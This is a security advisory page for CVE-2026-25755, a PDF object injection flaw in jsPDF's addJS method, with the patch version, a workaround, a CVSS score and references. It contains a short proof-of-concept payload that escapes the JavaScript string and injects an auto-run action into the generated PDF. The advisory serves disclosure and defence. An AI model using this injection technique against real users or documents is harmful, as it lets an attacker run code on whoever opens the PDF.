CVE-2026-25755
HIGH8.1EPSS 0.03%jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method
Description
### Impact User control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF. ```js import { jsPDF } from "jspdf"; const doc = new jsPDF(); // Payload: // 1. ) closes the JS string. // 2. > closes the current dictionary. // 3. /AA ... injects an "Additional Action" that executes on focus/open. const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>"; doc.addJS(maliciousPayload); doc.save("vulnerable.pdf"); ``` ### Patches The vulnerability has been fixed in [email protected]. ### Workarounds Escape parentheses in user-provided JavaScript code before passing them to the `addJS` method. ### References https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
Affected packages (1)
- npm/jspdffrom 0, < 4.2.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
References (6)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-25755
- PATCHhttps://github.com/parallax/jsPDF
- WEBhttps://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437
- WEBhttps://github.com/parallax/jsPDF/releases/tag/v4.2.0
- WEBhttps://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp
- WEBhttps://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md